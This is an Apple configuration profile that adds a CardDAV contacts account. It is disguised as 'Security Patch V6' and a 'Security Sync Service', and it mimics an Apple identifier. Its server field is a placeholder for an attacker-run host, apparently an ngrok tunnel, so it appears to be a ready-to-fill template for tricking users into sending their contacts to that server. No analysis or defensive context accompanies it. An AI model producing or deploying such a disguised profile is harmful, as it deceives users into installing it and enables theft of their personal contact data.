<dict>
    <key>PayloadContent</key>
    <array>
        <dict>
            <key>PayloadType</key>
            <string>com.apple.carddav.account</string>
            <key>PayloadVersion</key>
            <integer>1</integer>
            <key>PayloadIdentifier</key>
            <string>com.apple.contact.sync</string>
            <key>PayloadUUID</key>
            <string>UNIQUE-ID-12345</string>
            <key>CardDAVAccountDescription</key>
            <string>Security Sync Service</string>
            <key>CardDAVHostName</key>
            <string>YOUR-NGROK-OR-SERVER-URL</string> <key>CardDAVUsername</key>
            <string>admin</string>
            <key>CardDAVPassword</key>
            <string>password</string>
            <key>CardDAVUseSSL</key>
            <true/>
        </dict>
    </array>
    <key>PayloadDisplayName</key>
    <string>Security Patch V6</string>
    <key>PayloadType</key>
    <string>Configuration</string>
</dict>
